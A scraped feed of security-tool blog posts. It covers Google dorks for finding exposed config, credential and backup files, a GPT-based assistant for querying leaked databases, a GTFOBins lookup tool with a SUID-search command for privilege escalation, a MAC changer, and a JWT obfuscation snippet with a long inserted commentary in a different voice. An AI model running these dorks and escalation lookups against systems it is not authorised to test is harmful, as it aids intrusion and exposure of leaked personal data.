href="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM"><img alt="" border="0" height="596" id="BLOGGER_PHOTO_ID_7345705613876228946" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM=w640-h596" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7345705622803912882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg=w640-h576" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/akhomlyuk/pyradm" rel="nofollow" target="_blank" 
title="Download Pyradm">Download Pyradm</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47449134233814466432024-03-14T08:30:00.007-03:002024-03-14T08:30:00.232-03:00Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640" /></a></p><p><br /></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <span><a name='more'></a></span><p><br /></p> <p><a href="https://twitter.com/TakSec" rel="nofollow" target="_blank" title="A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting (3)"></a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | 
ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> 
<p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> <h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr /> <p>Medium articles for more dorks:</p> <p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> 
<p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-7402030000778680112024-03-13T08:30:00.001-03:002024-03-13T08:30:00.133-03:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" target="_blank" title="leaked">leaked</a> databases. 
This guide will help you set up and run the project in your local environment.</p><span><a name='more'></a></span><p><br /></p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong></li> </ol> <p>First, clone the GitHub repository to your local machine by executing the following commands in your terminal:</p> <pre><code>git clone https://github.com/luijait/DarkGPT.git<br />cd DarkGPT<br /></code></pre> <ol start="2"> <li><strong>Configure Environment Variables</strong></li> </ol> <p>You will need to set up some environment variables for the script to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code> and fill in your key:</p> <pre><code>DEHASHED_API_KEY="your_dehashed_api_key_here"<br /></code></pre> <ol start="3"> <li><strong>Install Dependencies</strong></li> </ol> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <pre><code>pip install -r requirements.txt<br /></code></pre> <ol start="4"> <li><strong>Run the Project</strong></li> </ol> <p>
Run the project:</p> <pre><code>python3 main.py<br /></code></pre><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35363097260777600322024-03-12T20:38:00.002-03:002024-03-12T20:38:28.523-03:00Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems<h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2><p><br /></p> <p><code>GTFOcli</code> is a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for quickly looking up binaries that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull 
cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for Unix binaries</h3> <p>Search for the <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for the binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for the binaries listed in a file:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for Windows binaries</h3> <p>Search for the binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for the binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for the binaries listed in a file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for the binary <code>Winget</code> and print the output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using the dockerized solution</h3> <p>Examples:</p> <p>Search for the binary <code>Winget</code> and print the output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for the binary <code>tar</code> and print the output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for the binaries listed in a file mounted as a volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br 
/>tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>A common use case for <code>gtfocli</code> is combining it with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>; without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16852404691714193012024-03-11T08:30:00.005-03:002024-03-11T08:30:00.134-03:00n0Mac - Yet Another Mac Changer!!!<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640" /></a></div><p><br /></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br /></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. 
The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-36129257561929026772024-03-10T08:30:00.004-03:002024-03-10T08:30:00.149-03:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><div><br /></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br /> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a 
name='more'></a></span><div><br /></div> <br /><span style="font-size: large;"><b>What is a JWT Token?</b></span><br /> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It is a standard, defined in RFC 7519. The token is a long string divided into parts separated by dots, each of which is base64url-encoded.</p> <p>Which parts the token has depends on the type of the JWT: whether it is a JWS (a signed token) or a JWE (an encrypted token). A signed token has three sections: the header, the payload, and the signature. An encrypted token consists of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is as <a href="https://www.kitploit.com/search/label/Access%20Tokens" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve other purposes as well.</p> <br /><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br /> <p>This code snippet offers a tweak aimed at improving the security of the payload section of JWT tokens, whose stored keys and values are visible in plaintext once the token is decoded. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. 
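The obfuscation this post describes in its Encryption and Decryption sections (a <code>userid|hashed_timestamp</code> string XORed byte by byte with a symmetric key, then Base64-encoded) is worked through below in a self-contained Python example. This is an added illustration, not the repository's own <code>main.py</code>. It assumes the timestamp is hashed with MD5 over its decimal string form (the 32-hex-digit hash in the post's preview suggests that), it repeats the key if it is shorter than the plaintext, and it reuses the sample user ID and XOR key printed in the preview as constructed inputs. It also shows the property a defender should notice: the same key bytes always mask the same leading plaintext, so every value produced for one user starts with the same Base64 prefix, and the values are linkable across tokens even though they "change".

```python
import base64
import hashlib
import time

# Sample values taken from the post's preview output (constructed inputs, not real secrets).
XOR_KEY = b"generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms"
SAMPLE_USER_ID = "23243232"
SAMPLE_TIMESTAMP = 1709160368


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the corresponding key byte (the key repeats if shorter)."""
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_userid(user_id: str, timestamp: int, key: bytes = XOR_KEY) -> str:
    """Build 'userid|md5(timestamp)', XOR it with the key and Base64-encode the result.

    Assumption: the timestamp is hashed with MD5 over its decimal string form; the
    post's preview shows a 32-hex-digit hash next to the user ID.
    """
    ts_hash = hashlib.md5(str(timestamp).encode()).hexdigest()
    plaintext = f"{user_id}|{ts_hash}".encode()
    return base64.b64encode(xor_bytes(plaintext, key)).decode()


def decode_userid(token_value: str, key: bytes = XOR_KEY) -> tuple[str, str]:
    """Reverse encode_userid: Base64-decode, XOR with the key, split at the '|' delimiter."""
    plaintext = xor_bytes(base64.b64decode(token_value), key).decode()
    user_id, _, ts_hash = plaintext.partition("|")
    if not user_id or len(ts_hash) != 32:
        raise ValueError("decoded value does not have the expected userid|hash shape")
    return user_id, ts_hash


def shared_prefix_len(a: str, b: str) -> int:
    """Length of the common leading substring of two encoded values."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def linkable_prefix(user_id: str, key: bytes = XOR_KEY) -> str:
    """The Base64 prefix that is identical in every value produced for this user.

    The first len(user_id)+1 plaintext bytes ('userid|') never change and are masked by
    the same key bytes each time, so their encoding is constant. Base64 works in 3-byte
    groups, so only the groups that lie fully inside that fixed region are exactly stable.
    """
    fixed = xor_bytes(f"{user_id}|".encode(), key)
    stable_bytes = len(fixed) - (len(fixed) % 3)
    return base64.b64encode(fixed[:stable_bytes]).decode()


if __name__ == "__main__":
    first = encode_userid(SAMPLE_USER_ID, SAMPLE_TIMESTAMP)
    second = encode_userid(SAMPLE_USER_ID, int(time.time()))
    print("value 1      :", first)
    print("value 2      :", second)
    print("decoded      :", decode_userid(first))
    print("common prefix:", first[: shared_prefix_len(first, second)])
    print("stable prefix:", linkable_prefix(SAMPLE_USER_ID))
```

Run as a script, it prints two encoded values for the same user and the prefix they share. The five sample values in the post's own preview all begin with <code>VVZcUUFTX14F</code> for exactly this reason: XOR with a fixed key is a fixed substitution at each byte position, so anything constant in the plaintext stays constant in the output, and one known user ID is enough to recover the masking bytes for those positions. That is why the author's note that this is obfuscation rather than security should be taken literally. If the identifier must not be readable from the token, an authenticated cipher with a fresh random nonce per token (for example AES-GCM from a maintained library), or an opaque server-side session reference in place of the raw ID, avoids both the linkability and the key exposure.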
The intention is to ensure that even if someone decodes the token, they cannot easily read the payload values.</p> <br /><span style="font-size: large;"><b>userid</b></span><br /> <ul> <li>The code snippet targets the key named "userid" stored in the payload section as an example.</li> <li>"userid" was chosen because it is frequently used for user identification or authentication after the token's validity has been checked (e.g., ensuring it has not expired).</li> </ul> <p>The idea behind obscuring the value of the "userid" key is as follows:</p> <br /><b>Encryption:</b><br /> <ul> <li>The timestamp is hashed and appended to the user ID with a "|" delimiter (<code>userid|hashed_timestamp</code>).</li> <li>The combined string is encrypted by a bitwise XOR with a symmetric key.</li> <li>The result is encoded using Base64 and stored as the payload value.</li> </ul> <br /><b>Decryption:</b><br /> <ul> <li>The encrypted data is decoded using Base64.</li> <li>Decryption is performed by XORing with the same symmetric key.</li> <li>The original user ID and hashed timestamp are revealed in plaintext.</li> <li>The user ID is extracted by splitting at the "|" delimiter for its intended use.</li> </ul> <br /><b>Symmetric Key for XOR Encoding:</b><br /> <ul> <li>Various materials can be used for this key.</li> <li>It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>However, this key must be stored securely, for example in the <a href="https://www.kitploit.com/search/label/Database%20Management" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>and..^^</p> <pre><code>in the example, the key is shown as { 'userid': 'random_value' },<br />making it apparent that it represents a user ID.<br /><br />However, this is merely for illustrative purposes.<br /><br />In practice, a predetermined and undisclosed name is typically used.<br />For example, 'a': 
'changing_random_value'<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure.</li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br /><span style="font-size: x-large;"><b>And...</b></span><br /> <ul> <li>If you find this helpful, please give it a <strong>"star"</strong> :star2: to support further improvements.</li> </ul> <br /><span style="font-size: x-large;"><b>preview</b></span><br /> <pre><code># python3 main.py<br /><br />- Current Unix Timestamp: 1709160368<br />- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08<br /><br />- userid: 23243232<br />- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'<br />- JWT Secret key: yes_your_service_jwt_secret_key<br /><br />- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=<br />- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c<br /><br />- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q<br />- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}<br /><br /><br /># run again<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}<br />- Decoded JWT: {'timestamp': 
